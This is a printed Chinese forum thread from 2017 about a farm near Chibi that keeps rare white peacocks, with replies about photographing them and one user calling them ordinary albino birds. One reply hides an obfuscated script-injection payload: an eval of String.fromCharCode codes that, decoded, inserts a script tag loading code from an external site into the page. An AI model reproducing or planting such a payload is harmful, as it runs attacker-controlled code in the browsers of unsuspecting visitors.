赤壁论坛

标题: 较罕见白孔雀!赤壁中伙董家岭村九组:凤博孔雀谢良蕴 [打印本页]

作者: 没有尽头20126    时间: 2017-2-7 16:55
标题: 较罕见白孔雀!赤壁中伙董家岭村九组:凤博孔雀谢良蕴

较罕见白孔雀!赤壁中伙董家岭村九组:凤博孔雀谢良蕴

谢良蕴的凤博孔雀地处赤壁中伙董家岭村九组
谢良蕴凤博孔雀貌似有一大一小两个较为罕见国家一级保护动物白孔雀
下面是拍摄的其中成年白孔雀...

较罕见白孔雀!赤壁中伙董家岭村九组:凤博孔雀谢良蕴

作者: 热线跟帖局局长    时间: 2017-2-7 18:11

作者: 没有尽头20126    时间: 2017-2-7 19:19
ABC1999929123 发表于 2017-2-7 19:07
是我拍摄的话,一定拍个孔雀开屏给大家过过眼福!

多谢指教

听说要天气热的时候才会开屏

去了两次天气不怎么样好

等哪一天大太阳了去拍拍

也是想看看呢
作者: 没有尽头20126    时间: 2017-2-7 19:20
ABC1999929123 发表于 2017-2-7 19:07

多谢指教

听说要天气热的时候才会开屏

去了两次天气不怎么样好

等哪一天大太阳了去拍拍

也是想看看呢
作者: 没有尽头20126    时间: 2017-2-7 19:21

董家岭并不远

开始没有去过 懵懵懂懂

去了三次算是知道了 原来只有十几公里
踩单车边玩边来回了

作者: minzhi5255    时间: 2017-2-7 19:44

白色的孔雀我确实没有见过

http://localhost/flash.swf?\'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+\'
作者: 没有尽头20126    时间: 2017-2-7 19:50
minzhi5255 发表于 2017-2-7 19:44
白色的孔雀我确实没有见过

全国都少

谢良蕴自从开始...到当下就是两只呢

罕见珍贵
作者: 东利    时间: 2017-2-8 00:24
就是孔雀里面的白化变异品种,遍地都是,请问有什么稀奇?楼主想要多少我随时给你弄过来!就一普通抗生素鸟而已,长期霸屏就没意思了
作者: 水中蛟龙    时间: 2017-2-9 10:30

作者: 水中蛟龙    时间: 2017-2-9 10:31

作者: 水中蛟龙    时间: 2017-2-9 10:31

作者: 0715红顶屋    时间: 2017-2-9 11:40
漂亮

欢迎光临 赤壁论坛 (https://cbrx.0715.cn/) Powered by Discuz! X3.2